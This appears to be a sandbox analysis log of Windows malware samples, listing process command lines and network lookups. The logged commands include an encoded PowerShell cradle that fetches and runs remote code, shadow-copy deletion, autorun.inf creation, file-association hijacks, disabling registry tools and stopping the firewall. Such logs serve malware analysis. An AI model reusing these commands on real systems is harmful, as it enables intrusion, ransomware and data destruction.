"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=2924,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\" -ad -an -ai#7zMap12901:190:7zEvent28505
C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\" -ad -an -ai#7zMap29832:190:7zEvent3947
C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe
"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ZeroLocker\ZeroRescue.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5708,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap6371:190:7zEvent12940
C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe
"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo ^[autorun^] >autorun.inf
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo ^open^=KasperskyScan^.exe >>autorun.inf
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=6624,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7544,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap25546:190:7zEvent32505
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap14106:190:7zEvent8523
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\" -ad -an -ai#7zMap16342:190:7zEvent8403
C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe
"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start %temp%\tmp1.jpg
C:\Users\Admin\AppData\Local\Temp\tmp1.jpg
C:\Users\Admin\AppData\Local\Temp\tmp1.jpg
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start %temp%\tmp2.exe
C:\Users\Admin\AppData\Local\Temp\tmp2.exe
C:\Users\Admin\AppData\Local\Temp\tmp2.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\tmp2.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /im taskmgr.exe /f
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C assoc .png=NotSoCleverBotFile
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C assoc .vbs=NotSoCleverBotFile
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C assoc .html=NotSoCleverBotFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C assoc .bat=NotSoCleverBotFile
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C assoc .jpn=EncryptedFile
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C assoc .js=exe1file
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ipconfig /release
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C net stop Windows Firewall
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\net.exe
net stop Windows Firewall
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Windows Firewall
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C net stop Network Connections
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\net.exe
net stop Network Connections
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Network Connections
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 728
C:\Windows\system32\dwm.exe
"dwm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.18.66.73:443 | copilot.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.18.66.73:443 | copilot.microsoft.com | tcp |
